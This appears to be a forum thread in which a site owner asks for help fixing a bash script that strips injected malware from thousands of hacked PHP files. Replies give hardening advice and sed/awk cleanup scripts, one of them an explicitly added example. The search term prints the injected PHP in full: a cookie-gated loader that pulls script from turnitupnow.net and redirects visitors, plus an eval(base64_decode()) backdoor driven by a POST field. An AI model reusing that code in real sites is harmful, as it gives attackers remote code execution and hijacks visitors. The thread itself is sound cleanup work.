LinuxQuestions.org (/questions/)
-   Linux - Newbie (https://www.linuxquestions.org/questions/linux-newbie-8/)
-   -   Could you help me get a script working? (https://www.linuxquestions.org/questions/linux-newbie-8/could-you-help-me-get-a-script-working-912989/)

seabro 11-11-2011 05:46 AM

Could you help me get a script working?
 
Hi all,

I had my website hacked and thousands of files have a malicious script added inside PHP files.

I have tried to remove the code using a script I located online but it fails.

I think the problem is due to use of special characters in the string I am searching for.

Here it is, if you could help me make it work I would be very grateful.


#!/bin/bash
# *****************************************************************************************
# find_and_replace_in_files.sh
# This script does a recursive, case sensitive directory search and replace of files
# To make a case insensitive search replace, use the -i switch in the grep call
# uses a startdirectory parameter so that you can run it outside of specified directory - else this script will modify itself!
# *****************************************************************************************
# **************** Change Variables Here ************
startdirectory="/path/to/public_html/"
# The search term is full of characters that the shell expands inside double
# quotes ($var, ") and that sed treats as regex metacharacters (., *, [, ], $, /),
# which is why the original assignment and the sed call failed. A quoted
# here-document keeps the term literal; it is escaped for sed further down.
searchterm=$(cat <<'EOF'
global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
EOF
)
replaceterm=""
# **********************************************************

echo "******************************************"
echo "* Search and Replace in Files Version .1 *"
echo "******************************************"

# Escape the characters sed treats specially (] / $ * . ^ [) so the term is
# matched literally. The term contains no backslashes, which would also need escaping.
escaped=$(printf '%s' "$searchterm" | sed -e 's/[]\/$*.^[]/\\&/g')

# grep -F looks for the fixed string; the variables are quoted so the term
# reaches grep as a single argument
for file in $(grep -l -R -F -- "$searchterm" "$startdirectory")
do
    sed -e "s/$escaped/$replaceterm/ig" "$file" > /tmp/tempfile.tmp
    mv /tmp/tempfile.tmp "$file"
    echo "Modified: $file"
done

echo " *** Yay! All Done! *** "



Many thanks,
sean

unSpawn 11-11-2011 07:01 AM

Quote:

Originally Posted by seabro (Post 4521426)
I had my website hacked

I'm sorry to hear that.


Quote:

Originally Posted by seabro (Post 4521426)
thousands of files have a malicious script added inside PHP files. I have tried to remove the code

I hope you took measures to prevent that from happening again. Plugging holes should start by finding out how the culprit came in (stolen FTP credentials, SSH brute forcing a lame password) or how the abuse could otherwise have happened (lackadaisical access permissions, vulnerable software versions) and could mean installing the newest version of any shopping cart, web log, statistics, web site, forum or plugin or other software in your web stack you use, and removing versions (and installation files) of software that is no longer maintained by its developers. (And if your "thousands of files" are the result of self-coded work then consider using a tool that is safe to use instead.) If you have not done any of the above then I suggest you do that before thinking about trying to revert the changes. If holes are left unplugged chances are those malicious changes will be back before you can say " *** Yay! All Done! *** ".


Quote:

Originally Posted by seabro (Post 4521426)
I think the problem is due to use of special characters in the string I am searching for.

While we can't have members post malicious code here, I wouldn't mind you passing it on to me via email. But code excerpt only please. If you manage to blithely send me a complete web page with like 1 line of malicious script code you simply won't get any reply back.

seabro 11-11-2011 07:14 AM

Quote:

Originally Posted by unSpawn (Post 4521465)
I'm sorry to hear that.



I hope you took measures to prevent that from happening again. Plugging holes should start by finding out how the culprit came in (stolen FTP credentials, SSH brute forcing a lame password) or how the abuse could otherwise have happened (lackadaisical access permissions, vulnerable software versions) and could mean installing the newest version of any shopping cart, web log, statistics, web site, forum or plugin or other software in your web stack you use, and removing versions (and installation files) of software that is no longer maintained by its developers. (And if your "thousands of files" are the result of self-coded work then consider using a tool that is safe to use instead.) If you have not done any of the above then I suggest you do that before thinking about trying to revert the changes. If holes are left unplugged chances are those malicious changes will be back before you can say " *** Yay! All Done! *** ".



While we can't have members post malicious code here, I wouldn't mind you passing it on to me via email. But code excerpt only please. If you manage to blithely send me a complete web page with like 1 line of malicious script code you simply won't get any reply back.


Hi,

The problem was with an old piece of gallery software I no longer use. It has since been removed.

The code is shown in my original post although that is not the only part of the attack. I had some tmp_xxxx.php files created and modifications to .htaccess.

The problem has been plugged, I just need to clean my .php files now.

Thanks,
Seabro

unSpawn 11-11-2011 07:26 AM

Quote:

Originally Posted by seabro (Post 4521474)
The problem was with an old piece of gallery software I no longer use. It has since been removed.

Good, good.


Quote:

Originally Posted by seabro (Post 4521474)
The code is shown in my original post

No, I meant the code that latched itself onto your PHP files. Although the "for" loop part could use some work as there's no need for temp files or a replacement string, and a "while" loop works better if there are any spaces in file names:
Code:

grep -l -R "$searchterm" "$startdirectory" 2>/dev/null | while IFS= read -r ITEM; do sed -i "s|$searchterm||ig" "${ITEM}"; done

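Both scripts in this thread hand the search term to sed as a regular expression, so the `$`, `[`, `.`, `*` and `/` in the injected code change its meaning. As an added example (not code from the thread or from either poster), the script below matches the term as a fixed string instead (grep -F for finding files, awk index() for removing it), keeps a .bak copy of each file it changes, and supports a dry run; it goes beyond the posted scripts in that it works for any term regardless of what characters it contains. The names clean_tree, demo and the CONSTRUCTED-MARKER sample are my own.

```shell
#!/bin/sh
# Added example: strip an exact string from every PHP file under a directory
# without treating it as a regular expression (the problem in the posted scripts).

# clean_tree DIR NEEDLE: remove every literal occurrence of NEEDLE from *.php
# files under DIR, keeping a .bak copy of each changed file. DRY_RUN=1 only
# lists the files. Prints the number of files that matched.
clean_tree() {
    dir=$1
    NEEDLE=$2
    export NEEDLE                     # awk reads it via ENVIRON: no escaping at all
    list=$(mktemp)
    # -F fixed string, -l names only, -r recurse; grep decides what gets touched
    grep -rlF --include='*.php' -- "$NEEDLE" "$dir" > "$list" || :
    count=0
    while IFS= read -r f; do
        count=$((count + 1))
        if [ "${DRY_RUN:-0}" = 1 ]; then
            echo "would clean: $f" >&2
            continue
        fi
        cp -p -- "$f" "$f.bak"        # keep the infected original as evidence
        # index() is a plain substring search, so metacharacters are harmless
        awk 'BEGIN { n = ENVIRON["NEEDLE"]; L = length(n) }
             { while ((i = index($0, n)) > 0)
                   $0 = substr($0, 1, i - 1) substr($0, i + L)
               print }' "$f.bak" > "$f"
        echo "cleaned: $f" >&2
    done < "$list"
    rm -f "$list"
    echo "$count"
}

# demo [1]: build a constructed tree (two infected .php files, one clean, one .txt
# that must be left alone), run clean_tree (dry run if the argument is 1) and
# print "<files matched> <php files still infected>".
demo() {
    DRY_RUN=${1:-0}
    t=$(mktemp -d)
    # harmless stand-in for the injected code, deliberately full of regex specials
    marker='<?php /* CONSTRUCTED-MARKER $x[0].*(1+2)/path */ ?>'
    mkdir -p "$t/sub"
    printf '%s\n<?php echo "a"; ?>\n' "$marker" > "$t/a.php"
    printf '<?php echo "b"; ?>\n%s\n' "$marker" > "$t/sub/b.php"
    printf '<?php echo "c"; ?>\n' > "$t/c.php"
    printf '%s\n' "$marker" > "$t/notes.txt"
    n=$(clean_tree "$t" "$marker")
    left=$(grep -rlF --include='*.php' -- "$marker" "$t" | wc -l | tr -d ' ')
    rm -rf "$t"
    echo "$n $left"
}
```

Run it as `DRY_RUN=1 clean_tree /path/to/public_html "$searchterm"` first to see what would be touched, then without DRY_RUN to clean; the .bak copies let you diff the before and after of any file.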
indyloft 03-25-2012 09:04 PM

I just encountered Seabro's issue and managed to find this thread. Unspawn or Seabro, could you pls share the code that can wipe it off? Damn turnitupnow..

seabro 03-26-2012 03:22 AM

hey indyloft,

sorry to hear of your problem.

It's been a while since this happened to me but I believe I ended up using 'sed'.

Check it out, it can run through a load of files and modify the contents. I used it simply to remove the unwanted code. There is probably another way which is much better but 'sed' worked for me.

Good luck.

seabro

